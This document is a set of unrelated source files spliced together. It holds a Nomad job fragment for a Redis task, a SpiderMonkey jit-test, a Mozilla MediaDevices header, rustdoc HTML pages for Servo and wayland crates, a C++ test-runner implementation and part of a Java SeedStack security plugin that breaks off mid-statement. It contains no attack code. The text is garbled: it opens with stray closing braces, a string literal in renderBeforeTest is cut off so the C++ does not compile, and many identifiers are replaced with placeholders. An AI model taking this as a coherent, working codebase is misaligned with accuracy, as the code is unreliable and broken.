	group "cache" {
		# Control the number of instances of this group.
		# Defaults to 1
		# count = 1

		# Configure the restart policy for the task group. If not provided, a
		# default is used based on the job type.
		restart {
			# The number of attempts to run the job within the specified interval.
			attempts = 10
			interval = "5m"

			# A delay between a task failing and a restart occurring.
			delay = "25s"

			# Mode controls what happens when a task has restarted "attempts"
			# times within the interval. "delay" mode delays the next restart
			# till the next interval. "fail" mode does not restart the task if
			# "attempts" has been hit within the interval.
			mode = "delay"
		}

		ephemeral_disk {
			# When sticky is true and the task group is updated, the scheduler
			# will prefer to place the updated allocation on the same node and
			# will migrate the data. This is useful for tasks that store data
			# that should persist across allocation updates.
			# sticky = true

			# Size of the shared ephemeral disk between tasks in the task group.
			size = 300
		}

		# Define a task to run
		task "redis" {
			# Use Docker to run the task.
			driver = "docker"

			# Configure Docker driver with the image
			config {
				image = "redis:latest"
				port_map {
					db = 6379
				}
			}

			service {
				name = "${TASKGROUP}-redis"
				tags = ["global", "cache"]
				port = "db"
				check {
					name = "alive"
					type = "tcp"
					interval = "10s"
					timeout = "2s"
				}
			}

			# We must specify the resources required for
			# this task to ensure it runs on a machine with
			# enough capacity.
			resources {
				cpu = 500 # 500 MHz
				memory = 256 # 256MB
				network {
					mbits = 10
					port "db" {
					}
				}
			}

			# The artifact block can be specified one or more times to download
			# artifacts prior to the task being started. This is convenient for
			# shipping configs or data needed by the task.
			# artifact {
			# options {
			# checksum = "md5:<API key>"

			# Specify configuration related to log rotation
			# logs {
			# max_files = 10
			# max_file_size = 15

			# Controls the timeout between signalling a task it will be killed
			# and killing the task. If not set a default is used.
			# kill_timeout = "20s"
		}
	}
}
`)
// |jit-test| error:RangeError;
// (The directive above tells the jit-test harness this script must terminate
// with a RangeError.)
load(libdir + "immutable-prototype.js");

// When TypedObject is not built into this shell, raise the expected
// RangeError manually so the harness expectation is still met.
if (!this.hasOwnProperty("TypedObject"))
    throw new RangeError();

// On builds where the global's prototype chain is mutable, swap in a proxy
// prototype first so the failing construction below walks through it.
if (<API key>())
    this.__proto__ = Proxy.create({});

// Constructing StructType with no arguments is expected to throw
// (a RangeError, per the harness directive above).
new TypedObject.StructType;
#ifndef <API key>
#define <API key>
#include "mozilla/ErrorResult.h"
#include "nsISupportsImpl.h"
#include "mozilla/<API key>.h"
#include "mozilla/dom/BindingUtils.h"
#include "nsPIDOMWindow.h"
#include "mozilla/media/<API key>.h"
namespace mozilla {
namespace dom {
class Promise;
struct <API key>;
struct <API key>;
#define <API key> \
{ 0x2f784d8a, 0x7485, 0x4280, \
{ 0x9a, 0x36, 0x74, 0xa4, 0xd6, 0x71, 0xa6, 0xc8 } }
// DOM MediaDevices object (the navigator.mediaDevices attribute): entry
// point for getUserMedia()/enumerateDevices() and the "devicechange" event.
class MediaDevices final : public <API key>
    ,public <API key>
{
public:
    // Bound to the inner window it was created for.
    explicit MediaDevices(nsPIDOMWindowInner* aWindow) :
        <API key>(aWindow) {}

    <API key>
    <API key>(<API key>)

    JSObject* WrapObject(JSContext* cx, JS::Handle<JSObject*> aGivenProto) override;

    // No code needed, as <API key> members default to true.
    void <API key>(<API key>& aResult) {};

    // Resolves with a MediaStream matching the constraints, or rejects.
    already_AddRefed<Promise>
    GetUserMedia(const <API key>& aConstraints, ErrorResult &aRv);

    // Resolves with the list of available media input/output devices.
    already_AddRefed<Promise>
    EnumerateDevices(ErrorResult &aRv);

    // Called when the set of media devices changes; feeds ondevicechange.
    virtual void OnDeviceChange() override;

    // devicechange event handler accessors (IDL "ondevicechange" attribute).
    mozilla::dom::EventHandlerNonNull* GetOndevicechange();
    void SetOndevicechange(mozilla::dom::EventHandlerNonNull* aCallback);

    NS_IMETHOD AddEventListener(const nsAString& aType,
                                nsIDOMEventListener* aListener,
                                bool aUseCapture, bool aWantsUntrusted,
                                uint8_t optional_argc) override;

    virtual void AddEventListener(const nsAString& aType,
                                  dom::EventListener* aListener,
                                  const dom::<API key>& aOptions,
                                  const dom::Nullable<bool>& aWantsUntrusted,
                                  ErrorResult& aRv) override;

private:
    // Promise resolver/rejecter helper classes (defined in the .cpp).
    class GumResolver;
    class EnumDevResolver;
    class GumRejecter;

    virtual ~MediaDevices();

    // NOTE(review): presumably used to delay/coalesce devicechange events --
    // verify against the implementation file.
    nsCOMPtr<nsITimer> mFuzzTimer;
};
<API key>(MediaDevices,
<API key>)
} // namespace dom
} // namespace mozilla
#endif // <API key> |
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta name="generator" content="rustdoc">
<meta name="description" content="API documentation for the Rust `<API key>` constant in crate `wayland_kbd`.">
<meta name="keywords" content="rust, rustlang, rust-lang, <API key>">
<title>wayland_kbd::keysyms::<API key> - Rust</title>
<link rel="stylesheet" type="text/css" href="../../main.css">
</head>
<body class="rustdoc">
<!--[if lte IE 8]>
<div class="warning">
This old browser is unsupported and will most likely display funky
things.
</div>
<![endif]-->
<section class="sidebar">
<p class='location'><a href='../index.html'>wayland_kbd</a>::<wbr><a href='index.html'>keysyms</a></p><script>window.sidebarCurrent = {name: '<API key>', ty: 'constant', relpath: ''};</script><script defer src="sidebar-items.js"></script>
</section>
<nav class="sub">
<form class="search-form js-only">
<div class="search-container">
<input class="search-input" name="search"
autocomplete="off"
placeholder="Click or press ‘S’ to search, ‘?’ for more options…"
type="search">
</div>
</form>
</nav>
<section id='main' class="content constant">
<h1 class='fqn'><span class='in-band'><a href='../index.html'>wayland_kbd</a>::<wbr><a href='index.html'>keysyms</a>::<wbr><a class='constant' href=''><API key></a></span><span class='out-of-band'><span id='render-detail'>
<a id="toggle-all-docs" href="javascript:void(0)" title="collapse all docs">
[<span class='inner'>−</span>]
</a>
</span><a id='src-2624' class='srclink' href='../../src/wayland_kbd/ffi/keysyms.rs.html#1112' title='goto source code'>[src]</a></span></h1>
<pre class='rust const'>pub const <API key>: <a href='../../std/primitive.u32.html'>u32</a><code> = </code><code>0x10004ba</code></pre></section>
<section id='search' class="content hidden"></section>
<section class="footer"></section>
<div id="help" class="hidden">
<div>
<div class="shortcuts">
<h1>Keyboard Shortcuts</h1>
<dl>
<dt>?</dt>
<dd>Show this help dialog</dd>
<dt>S</dt>
<dd>Focus the search field</dd>
<dt>⇤</dt>
<dd>Move up in search results</dd>
<dt>⇥</dt>
<dd>Move down in search results</dd>
<dt>⏎</dt>
<dd>Go to active search result</dd>
</dl>
</div>
<div class="infos">
<h1>Search Tricks</h1>
<p>
Prefix searches with a type followed by a colon (e.g.
<code>fn:</code>) to restrict the search to a given type.
</p>
<p>
Accepted types are: <code>fn</code>, <code>mod</code>,
<code>struct</code>, <code>enum</code>,
<code>trait</code>, <code>type</code>, <code>macro</code>,
and <code>const</code>.
</p>
<p>
Search functions by type signature (e.g.
<code>vec -> usize</code>)
</p>
</div>
</div>
</div>
<script>
window.rootPath = "../../";
window.currentCrate = "wayland_kbd";
window.playgroundUrl = "";
</script>
<script src="../../jquery.js"></script>
<script src="../../main.js"></script>
<script async src="../../search-index.js"></script>
</body>
</html> |
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta name="generator" content="rustdoc">
<meta name="description" content="API documentation for the Rust `NetworkEvent` enum in crate `devtools_traits`.">
<meta name="keywords" content="rust, rustlang, rust-lang, NetworkEvent">
<title>devtools_traits::NetworkEvent - Rust</title>
<link rel="stylesheet" type="text/css" href="../main.css">
</head>
<body class="rustdoc">
<!--[if lte IE 8]>
<div class="warning">
This old browser is unsupported and will most likely display funky
things.
</div>
<![endif]-->
<section class="sidebar">
<p class='location'><a href='index.html'>devtools_traits</a></p><script>window.sidebarCurrent = {name: 'NetworkEvent', ty: 'enum', relpath: ''};</script><script defer src="sidebar-items.js"></script>
</section>
<nav class="sub">
<form class="search-form js-only">
<div class="search-container">
<input class="search-input" name="search"
autocomplete="off"
placeholder="Click or press ‘S’ to search, ‘?’ for more options…"
type="search">
</div>
</form>
</nav>
<section id='main' class="content enum">
<h1 class='fqn'><span class='in-band'>Enum <a href='index.html'>devtools_traits</a>::<wbr><a class='enum' href=''>NetworkEvent</a></span><span class='out-of-band'><span id='render-detail'>
<a id="toggle-all-docs" href="javascript:void(0)" title="collapse all docs">
[<span class='inner'>−</span>]
</a>
</span><a id='src-21620' class='srclink' href='../src/devtools_traits/lib.rs.html#265-268' title='goto source code'>[src]</a></span></h1>
<pre class='rust enum'>pub enum NetworkEvent {
HttpRequest(<a class='struct' href='../url/struct.Url.html' title='url::Url'>Url</a>, <a class='enum' href='../hyper/method/enum.Method.html' title='hyper::method::Method'>Method</a>, <a class='struct' href='../hyper/header/struct.Headers.html' title='hyper::header::Headers'>Headers</a>, <a class='enum' href='../core/option/enum.Option.html' title='core::option::Option'>Option</a><<a class='struct' href='../collections/vec/struct.Vec.html' title='collections::vec::Vec'>Vec</a><<a href='../std/primitive.u8.html'>u8</a>>>),
HttpResponse(<a class='enum' href='../core/option/enum.Option.html' title='core::option::Option'>Option</a><<a class='struct' href='../hyper/header/struct.Headers.html' title='hyper::header::Headers'>Headers</a>>, <a class='enum' href='../core/option/enum.Option.html' title='core::option::Option'>Option</a><<a class='struct' href='../hyper/http/struct.RawStatus.html' title='hyper::http::RawStatus'>RawStatus</a>>, <a class='enum' href='../core/option/enum.Option.html' title='core::option::Option'>Option</a><<a class='struct' href='../collections/vec/struct.Vec.html' title='collections::vec::Vec'>Vec</a><<a href='../std/primitive.u8.html'>u8</a>>>),
}</pre><h2 class='variants'>Variants</h2>
<table><tr><td id='variant.HttpRequest'><code>HttpRequest</code></td><td></td></tr><tr><td id='variant.HttpResponse'><code>HttpResponse</code></td><td></td></tr></table><h2 id='implementations'>Trait Implementations</h2><h3 id='<API key>'>Derived Implementations </h3><h3 class='impl'><code>impl <a class='trait' href='../core/clone/trait.Clone.html' title='core::clone::Clone'>Clone</a> for <a class='enum' href='../devtools_traits/enum.NetworkEvent.html' title='devtools_traits::NetworkEvent'>NetworkEvent</a></code></h3><div class='impl-items'><h4 id='method.clone' class='method'><code>fn <a href='../core/clone/trait.Clone.html#method.clone' class='fnname'>clone</a>(&self) -> <a class='enum' href='../devtools_traits/enum.NetworkEvent.html' title='devtools_traits::NetworkEvent'>NetworkEvent</a></code></h4>
<h4 id='method.clone_from' class='method'><code>fn <a href='../core/clone/trait.Clone.html#method.clone_from' class='fnname'>clone_from</a>(&mut self, source: &Self)</code></h4>
</div></section>
<section id='search' class="content hidden"></section>
<section class="footer"></section>
<div id="help" class="hidden">
<div>
<div class="shortcuts">
<h1>Keyboard Shortcuts</h1>
<dl>
<dt>?</dt>
<dd>Show this help dialog</dd>
<dt>S</dt>
<dd>Focus the search field</dd>
<dt>⇤</dt>
<dd>Move up in search results</dd>
<dt>⇥</dt>
<dd>Move down in search results</dd>
<dt>⏎</dt>
<dd>Go to active search result</dd>
</dl>
</div>
<div class="infos">
<h1>Search Tricks</h1>
<p>
Prefix searches with a type followed by a colon (e.g.
<code>fn:</code>) to restrict the search to a given type.
</p>
<p>
Accepted types are: <code>fn</code>, <code>mod</code>,
<code>struct</code>, <code>enum</code>,
<code>trait</code>, <code>type</code>, <code>macro</code>,
and <code>const</code>.
</p>
<p>
Search functions by type signature (e.g.
<code>vec -> usize</code>)
</p>
</div>
</div>
</div>
<script>
window.rootPath = "../";
window.currentCrate = "devtools_traits";
window.playgroundUrl = "";
</script>
<script src="../jquery.js"></script>
<script src="../main.js"></script>
<script async src="../search-index.js"></script>
</body>
</html> |
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta name="generator" content="rustdoc">
<meta name="description" content="API documentation for the Rust `bgColor_getterinfo` constant in crate `script`.">
<meta name="keywords" content="rust, rustlang, rust-lang, bgColor_getterinfo">
<title>script::dom::bindings::codegen::Bindings::DocumentBinding::bgColor_getterinfo - Rust</title>
<link rel="stylesheet" type="text/css" href="../../../../../../main.css">
</head>
<body class="rustdoc">
<!--[if lte IE 8]>
<div class="warning">
This old browser is unsupported and will most likely display funky
things.
</div>
<![endif]-->
<section class="sidebar">
<p class='location'><a href='../../../../../index.html'>script</a>::<wbr><a href='../../../../index.html'>dom</a>::<wbr><a href='../../../index.html'>bindings</a>::<wbr><a href='../../index.html'>codegen</a>::<wbr><a href='../index.html'>Bindings</a>::<wbr><a href='index.html'>DocumentBinding</a></p><script>window.sidebarCurrent = {name: 'bgColor_getterinfo', ty: 'constant', relpath: ''};</script><script defer src="sidebar-items.js"></script>
</section>
<nav class="sub">
<form class="search-form js-only">
<div class="search-container">
<input class="search-input" name="search"
autocomplete="off"
placeholder="Click or press ‘S’ to search, ‘?’ for more options…"
type="search">
</div>
</form>
</nav>
<section id='main' class="content constant">
<h1 class='fqn'><span class='in-band'><a href='../../../../../index.html'>script</a>::<wbr><a href='../../../../index.html'>dom</a>::<wbr><a href='../../../index.html'>bindings</a>::<wbr><a href='../../index.html'>codegen</a>::<wbr><a href='../index.html'>Bindings</a>::<wbr><a href='index.html'>DocumentBinding</a>::<wbr><a class='constant' href=''>bgColor_getterinfo</a></span><span class='out-of-band'><span id='render-detail'>
<a id="toggle-all-docs" href="javascript:void(0)" title="collapse all docs">
[<span class='inner'>−</span>]
</a>
</span><a id='src-173190' class='srclink' href='../../../../../../src/script///home/servo/buildbot/slave/doc/build/target/debug/build/<API key>/out/Bindings/DocumentBinding.rs.html#1754-1767' title='goto source code'>[src]</a></span></h1>
<pre class='rust const'>const bgColor_getterinfo: <a class='struct' href='../../../../../../js/jsapi/struct.JSJitInfo.html' title='js::jsapi::JSJitInfo'>JSJitInfo</a><code> = </code><code>JSJitInfo {
_bindgen_data_1_: get_bgColor as *const ::libc::c_void,
protoID: PrototypeList::ID::Document as u16,
depth: 2,
_bitfield_1: ((JSJitInfo_OpType::Getter as u32) << 0) |
((JSJitInfo_AliasSet::AliasEverything as u32) << 4) |
((JSValueType::JSVAL_TYPE_STRING as u32) << 8) |
((true as u32) << 16) |
((false as u32) << 17) |
((false as u32) << 18) |
((false as u32) << 19) |
((false as u32) << 20) |
((0 as u32) << 21)
}</code></pre></section>
<section id='search' class="content hidden"></section>
<section class="footer"></section>
<div id="help" class="hidden">
<div>
<div class="shortcuts">
<h1>Keyboard Shortcuts</h1>
<dl>
<dt>?</dt>
<dd>Show this help dialog</dd>
<dt>S</dt>
<dd>Focus the search field</dd>
<dt>⇤</dt>
<dd>Move up in search results</dd>
<dt>⇥</dt>
<dd>Move down in search results</dd>
<dt>⏎</dt>
<dd>Go to active search result</dd>
</dl>
</div>
<div class="infos">
<h1>Search Tricks</h1>
<p>
Prefix searches with a type followed by a colon (e.g.
<code>fn:</code>) to restrict the search to a given type.
</p>
<p>
Accepted types are: <code>fn</code>, <code>mod</code>,
<code>struct</code>, <code>enum</code>,
<code>trait</code>, <code>type</code>, <code>macro</code>,
and <code>const</code>.
</p>
<p>
Search functions by type signature (e.g.
<code>vec -> usize</code>)
</p>
</div>
</div>
</div>
<script>
window.rootPath = "../../../../../../";
window.currentCrate = "script";
window.playgroundUrl = "";
</script>
<script src="../../../../../../jquery.js"></script>
<script src="../../../../../../main.js"></script>
<script async src="../../../../../../search-index.js"></script>
</body>
</html> |
// This Source Code Form is subject to the terms of the Mozilla Public
// License, v. 2.0. If a copy of the MPL was not distributed with this
// file, You can obtain one at http://mozilla.org/MPL/2.0/.
// Includes
#include "TestRunner.h"
#include "Optarg.h"
#include "TestAssert.h"
#include "TestJUnitXmlReport.h"
#include "TestTag.h"
#include "TestSuite.h"
#include <string.h>
#include <iostream>
#include <fstream>
using namespace std;
// Private Macros
// Private Type Definitions
// Private Function and Class Declarations
// Variable Declarations
// Function and Class Implementation
// Constructs the runner: parses the command-line options, creates a suite
// object for every statically registered suite tag, then attaches every
// registered test executor to the suite declared in the same file.
// Fixed: removed two unused locals — a local `fileToSuite` map that shadowed
// the m_fileToSuite member actually used by addSuite(), and an unused
// `defaultSuites` vector.
TestRunner::TestRunner(int argc, char* argv[])
    : m_stopOnError(true)
{
    parseArguments(argc, argv);
    // Create all the statically registered suites.
    for (const TestSuite::Tag *suiteTag = TestSuite::Tag::first(); suiteTag != NULL; suiteTag = suiteTag->next())
    {
        addSuite(new TestSuite(*this, *suiteTag));
    }
    // Now add all the executors to the appropriate suites.
    for (const TestTag *tag = TestTag::first(); tag != NULL; tag = tag->next())
    {
        addExecution(tag);
    }
}
// Destroys the runner, releasing every suite it owns.
TestRunner::~TestRunner(void)
{
    // The runner owns all suites in m_suites (created in the constructor or
    // in addExecution), so free each one here.
    for (vector<TestSuite *>::iterator it = m_suites.begin(); it != m_suites.end(); ++it)
    {
        delete *it;
    }
}
// Parses the command-line options:
//   -c : bound to m_stopOnError; per the help text, presence of the flag
//        means "continue even when a test fails" (stop-on-error is the
//        default).  NOTE(review): assumes Optarg::opt clears the bool when
//        the flag is present — confirm against Optarg's implementation.
//   -j : name of the JUnit XML report file (empty means no report).
void TestRunner::parseArguments(int argc, char* argv[])
{
    Optarg cfg(argc, argv);
    cfg.opt('c', m_stopOnError, "Continue even when a test fails (stops on error by default).");
    cfg.opt('j', m_junitXmlFile, "The name of the JUnit XML file to write with the test results.");
}
// Inserts 'suite' into the ordered m_suites vector and registers it in the
// per-file m_fileToSuite map (ordered by declaration line, lowest first).
// Takes ownership of 'suite' (deleted in the destructor).
// NOTE(review): the priority comparison computes existing - candidate, while
// the name/file/line comparisons compute candidate - existing; the operand
// order looks inconsistent with the "lowest first" comment below — confirm
// which priority ordering is intended before relying on it.
void TestRunner::addSuite(TestSuite *suite)
{
    // Order based on priority, name, file, the line number - lowest first.
    vector<TestSuite *>::iterator vit;
    bool inserted = false;
    for (vit = m_suites.begin(); vit != m_suites.end(); vit++)
    {
        int cmp = (*vit)->priority() - suite->priority();
        if (cmp == 0)
        {
            cmp = strcmp(suite->name(), (*vit)->name());
            if (cmp == 0)
            {
                cmp = strcmp(suite->file(), (*vit)->file());
                if (cmp == 0)
                {
                    cmp = suite->line() - (*vit)->line();
                }
            }
        }
        if (cmp < 0)
        {
            // Found the first element that should come after 'suite'.
            m_suites.insert(vit, suite);
            inserted = true;
            break;
        }
    }
    if (!inserted)
    {
        // 'suite' sorts after everything currently present.
        m_suites.push_back(suite);
    }
    // Insert into the map - could be multiple suites per file.
    map<string, vector<TestSuite *> >::iterator it = m_fileToSuite.find(suite->file());
    if (it == m_fileToSuite.end())
    {
        // First suite seen for this file: start a new vector.
        vector<TestSuite *> newVector;
        newVector.push_back(suite);
        m_fileToSuite[suite->file()] = newVector;
    }
    else
    {
        // Order based on line number, lowest first.
        for (vit = it->second.begin(); vit != it->second.end(); vit++)
        {
            if (suite->line() < (*vit)->line())
            {
                it->second.insert(vit, suite);
                return;
            }
        }
        it->second.push_back(suite);
    }
}
// Attaches the test executor described by 'tag' to a suite declared in the
// same source file.  If that file has no suite yet, a "Default" suite is
// created for it.  When the file declares several suites, the executor is
// attached to the last suite declared at or before the executor's line
// (falling back to the file's first suite).
void TestRunner::addExecution(const TestTag *tag)
{
    // Find the suite for the executor.
    TestSuite *suite;
    map<string, vector<TestSuite *> >::iterator it = m_fileToSuite.find(tag->file());
    if (it == m_fileToSuite.end())
    {
        // Create a new suite based on this executor.
        // NOTE(review): 'suiteTag' is heap-allocated and not deleted here;
        // presumably the three-argument TestSuite constructor takes ownership
        // of it — confirm against TestSuite's implementation.
        TestSuite::Tag *suiteTag = new TestSuite::Tag(tag->file(), tag->line(), "Default", 0);
        suite = new TestSuite(*this, *suiteTag, suiteTag);
        addSuite(suite);
    }
    else
    {
        // Search the list - look for the last item where the line() of the
        // executor is higher than the line() of the suite.
        // The vector is ordered by line (see addSuite), so scan backwards
        // from the end; index 0 is the fallback.
        suite = it->second[0];
        for (size_t i = it->second.size() - 1; i >= 1; --i)
        {
            if (tag->line() >= it->second[i]->line())
            {
                suite = it->second[i];
                break;
            }
        }
    }
    // Add the executor to the suite.
    suite->addExecution(tag);
}
// Runs every execution of every suite in suite order, bucketing results into
// m_pass / m_fail / m_notExecuted.  When m_stopOnError is set, the first
// failure causes all remaining executions to be skipped and recorded as not
// executed.  After the run, a summary is printed and, if configured via -j,
// a JUnit XML report is written.
// Returns 0 when no test failed, 1 otherwise (suitable as a process exit code).
int TestRunner::run(void)
{
    // Reset the result buckets so run() can be called more than once.
    m_pass.clear();
    m_fail.clear();
    m_notExecuted.clear();
    for (size_t i = 0; i < m_suites.size(); ++i)
    {
        TestSuite *suite = m_suites[i];
        for (size_t j = 0; j < suite->executionCount(); ++j)
        {
            TestExecution& exec = suite->execution(j);
            if (m_stopOnError && m_fail.size() > 0)
            {
                // A test already failed and stop-on-error is active: skip the
                // rest, recording each as not executed.
                exec.clearExecuted();
                m_notExecuted.push_back(&exec);
            }
            else
            {
                // Run the test with the 'current' indicator set.
                // The inner braces scope the Current object to the duration
                // of the execution; presumably its constructor/destructor
                // mark and unmark exec as the currently running test —
                // confirm against TestExecution::Current.
                {
                    TestExecution::Current current(exec);
                    renderBeforeTest(exec);
                    beforeTest(exec);
                    exec.execute();
                    afterTest(exec);
                    renderAfterTest(exec);
                }
                if (exec.isFail())
                {
                    m_fail.push_back(&exec);
                }
                else
                {
                    m_pass.push_back(&exec);
                }
            }
        }
    }
    renderAfterRunner();
    // Publish the JUnit XML report if a file name was supplied via -j.
    if (m_junitXmlFile.size() > 0)
    {
        TestJUnitXmlReport report(*this);
        ofstream os(m_junitXmlFile.c_str(), ofstream::out);
        report.publish(os);
        os.close();
    }
    return m_fail.size() == 0 ? 0 : 1;
}
// Called by the assertion machinery when an assertion fails; simply forwards
// the assertion details to the console renderer.
void TestRunner::notifyAssertion(const TestAssert& ast)
{
    renderAssertion(ast);
}
void TestRunner::renderBeforeTest(const TestExecution& exec)
{
cout << "
}
// Prints the details of a failed assertion to stdout.  The header and detail
// lines vary with the assertion type: plain assertion failures show the
// expression (plus its decomposition when available); exception-related
// failures show the exception name and, when present, its message.
void TestRunner::renderAssertion(const TestAssert& ast)
{
    cout << "!!!!!!! ";
    switch (ast.type())
    {
    default:
        cout << "ASSERTION FAILURE";
        break;
    case TestAssert::EXPECTED_EXCEPTION:
        cout << "EXPECTED EXCEPTION NOT RAISED";
        break;
    case TestAssert::<API key>:
        cout << "UNEXPECTED EXCEPTION";
        break;
    }
    cout << endl;
    cout << " Test: " << ast.execution().suite().name() << "::" << ast.execution().name() << endl;
    // NOTE(review): the line below emits a closing ")" with no matching "(" —
    // looks like a leftover from an earlier format; output left unchanged.
    cout << " declared at " << ast.execution().file() << ":" << ast.execution().line() << ")" << endl;
    if (ast.type() != TestAssert::<API key>)
    {
        cout << " Function: " << ast.function() << endl;
        cout << " Location: " << ast.file() << ":" << ast.line() << endl;
    }
    switch (ast.type())
    {
    default:
        cout << " Expression: " << ast.expr() << endl;
        if (ast.exprDecomp().size() > 0)
        {
            // NOTE(review): "Evalulated" is a typo in the output string
            // ("Evaluated"); left as-is since it is runtime output.
            cout << " Evalulated: " << ast.exprDecomp() << endl;
        }
        break;
    case TestAssert::EXPECTED_EXCEPTION:
        cout << " Exception: " << ast.exceptionName() << endl;
        cout << " Expression: " << ast.expr() << endl;
        break;
    case TestAssert::<API key>:
        cout << " Exception: " << ast.exceptionName() << endl;
        if (ast.exceptionMessage().size() > 0)
        {
            cout << " Message: " << ast.exceptionMessage() << endl;
        }
        break;
    }
}
// Prints a banner after a test execution finishes.
// NOTE(review): the original string literal on the first output line was
// truncated in the reviewed copy of the file (only `"<<` survived); the
// banner text is reconstructed to match the "!!!!!!! " / ">>>>>>>" banner
// style used elsewhere in this file — confirm against the original source.
void TestRunner::renderAfterTest(const TestExecution& exec)
{
    cout << "<<<<<<< Finished "
         << exec.suite().name() << "::" << exec.name() << endl << endl;
}
// Prints the end-of-run summary: the number of tests and assertions run,
// then either "All passed." or a passed/failed/not-executed breakdown.
void TestRunner::renderAfterRunner(void)
{
    // Total the assertions across every executed test (passed and failed;
    // not-executed tests by definition ran no assertions).
    size_t assertionTotal = 0;
    for (size_t i = 0; i < m_pass.size(); ++i)
    {
        assertionTotal += m_pass[i]->assertionCount();
    }
    for (size_t i = 0; i < m_fail.size(); ++i)
    {
        assertionTotal += m_fail[i]->assertionCount();
    }
    size_t total = m_pass.size() + m_fail.size() + m_notExecuted.size();
    cout << "Ran " << total << (total == 1 ? " test" : " tests");
    cout << " consisting of " << assertionTotal << (assertionTotal == 1 ? " assertion" : " assertions");
    cout << ": ";
    if (m_fail.size() == 0 && m_notExecuted.size() == 0)
    {
        // Fixed: dropped the literal's leading space, which produced a
        // double space after the ": " separator ("...:  All passed.").
        cout << "All passed.";
    }
    else
    {
        cout << m_pass.size() << " passed, " << m_fail.size() << " failed";
        if (m_notExecuted.size() > 0)
        {
            cout << ", and " << m_notExecuted.size() << " not executed";
        }
        cout << ".";
    }
    cout << endl;
}
// Per-test setup hook invoked just before each test executes.  No-op here;
// intended as an extension point for subclasses or future use.
void TestRunner::beforeTest(const TestExecution& exec)
{
}
// Per-test teardown hook invoked just after each test executes.  No-op here;
// intended as an extension point for subclasses or future use.
void TestRunner::afterTest(const TestExecution& exec)
{
}
package org.seedstack.seed.security.internal;
import static org.seedstack.shed.misc.PriorityUtils.sortByPriority;
import com.google.common.collect.Lists;
import io.nuun.kernel.api.plugin.InitState;
import io.nuun.kernel.api.plugin.context.InitContext;
import io.nuun.kernel.api.plugin.request.<API key>;
import java.util.ArrayList;
import java.util.Collection;
import java.util.HashMap;
import java.util.HashSet;
import java.util.List;
import java.util.Map;
import java.util.Set;
import org.seedstack.seed.SeedException;
import org.seedstack.seed.core.internal.AbstractSeedPlugin;
import org.seedstack.seed.core.internal.el.ELPlugin;
import org.seedstack.seed.security.PrincipalCustomizer;
import org.seedstack.seed.security.Realm;
import org.seedstack.seed.security.RoleMapping;
import org.seedstack.seed.security.<API key>;
import org.seedstack.seed.security.Scope;
import org.seedstack.seed.security.SecurityConfig;
import org.seedstack.seed.security.spi.CrudActionResolver;
import org.seedstack.seed.security.spi.SecurityScope;
import org.seedstack.shed.misc.PriorityUtils;
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;
/**
* This plugin provides core security infrastructure, based on Apache Shiro
* implementation.
*/
public class SecurityPlugin extends AbstractSeedPlugin {
    private static final Logger LOGGER = LoggerFactory.getLogger(SecurityPlugin.class);
    // Maps a security scope name to the class implementing it; populated by
    // configureScopes() during initialization.
    private final Map<String, Class<? extends Scope>> scopeClasses = new HashMap<>();
    // Security providers discovered through the plugin dependency mechanism.
    private final Set<SecurityProvider> securityProviders = new HashSet<>();
    // Detected CRUD action resolver classes, sorted via sortByPriority().
    private final List<Class<? extends CrudActionResolver>> crudActionResolvers = new ArrayList<>();
    private SecurityConfigurer securityConfigurer;

    @Override
    public String name() {
        return "security";
    }

    @Override
    public Collection<Class<?>> dependencies() {
        // Depends on all SecurityProvider implementations so they are
        // initialized before this plugin.
        return Lists.newArrayList(SecurityProvider.class);
    }

    // Requests classpath scanning for every security-related extension type.
    // NOTE(review): the method and return-type identifiers were redacted in
    // this copy of the file.
    @Override
    public Collection<<API key>> <API key>() {
        return <API key>()
                .subtypeOf(Realm.class)
                .subtypeOf(RoleMapping.class)
                .subtypeOf(<API key>.class)
                .subtypeOf(Scope.class)
                .subtypeOf(PrincipalCustomizer.class)
                .subtypeOf(CrudActionResolver.class)
                .build();
    }

    // Collects the scan results, registers scopes and CRUD action resolvers,
    // gathers providers and builds the SecurityConfigurer used by the module.
    @Override
    @SuppressWarnings({"unchecked"})
    public InitState initialize(InitContext initContext) {
        SecurityConfig securityConfig = getConfiguration(SecurityConfig.class);
        Map<Class<?>, Collection<Class<?>>> scannedClasses = initContext.<API key>();
        configureScopes(scannedClasses.get(Scope.class));
        <API key>(scannedClasses.get(CrudActionResolver.class));
        securityProviders.addAll(initContext.dependencies(SecurityProvider.class));
        securityConfigurer = new SecurityConfigurer(
                securityConfig,
                scannedClasses,
                (Collection) scannedClasses.get(PrincipalCustomizer.class)
        );
        return InitState.INITIALIZED;
    }

    // Registers the scanned CRUD action resolver classes, keeping the list
    // sorted by priority.  NOTE(review): method identifier redacted in this
    // copy of the file.
    @SuppressWarnings("unchecked")
    private void <API key>(Collection<Class<?>> candidates) {
        if (candidates != null) {
            candidates.stream()
                    .map(x -> (Class<? extends CrudActionResolver>) x)
                    .forEach(crudActionResolvers::add);
            sortByPriority(crudActionResolvers, PriorityUtils::priorityOfClassOf);
            if (LOGGER.isDebugEnabled()) {
                for (Class<? extends CrudActionResolver> crudActionResolver : crudActionResolvers) {
                    LOGGER.debug("CRUD action resolver {} detected", crudActionResolver.getName());
                }
            }
        }
    }

    // Registers the scanned Scope implementations under their declared name
    // (@SecurityScope value, or the simple class name when absent).  Each
    // scope class must expose a single-String constructor; duplicate scope
    // names are an error.
    @SuppressWarnings("unchecked")
    private void configureScopes(Collection<Class<?>> candidates) {
        if (candidates != null) {
            for (Class<?> candidate : candidates) {
                if (Scope.class.isAssignableFrom(candidate)) {
                    SecurityScope securityScope = candidate.getAnnotation(SecurityScope.class);
                    String scopeName;
                    if (securityScope != null) {
                        scopeName = securityScope.value();
                    } else {
                        scopeName = candidate.getSimpleName();
                    }
                    // Verify the scope exposes the required String constructor.
                    try {
                        candidate.getConstructor(String.class);
                    } catch (<API key> e) {
                        throw SeedException.wrap(e, SecurityErrorCode.<API key>)
                                .put("scopeName", scopeName)
                                .put("class", candidate.getName());
                    }
                    // Reject two scope classes claiming the same name.
                    if (scopeClasses.containsKey(scopeName)) {
                        throw SeedException.createNew(SecurityErrorCode.<API key>)
                                .put("scopeName", scopeName)
                                .put("class1", scopeClasses.get(scopeName).getName())
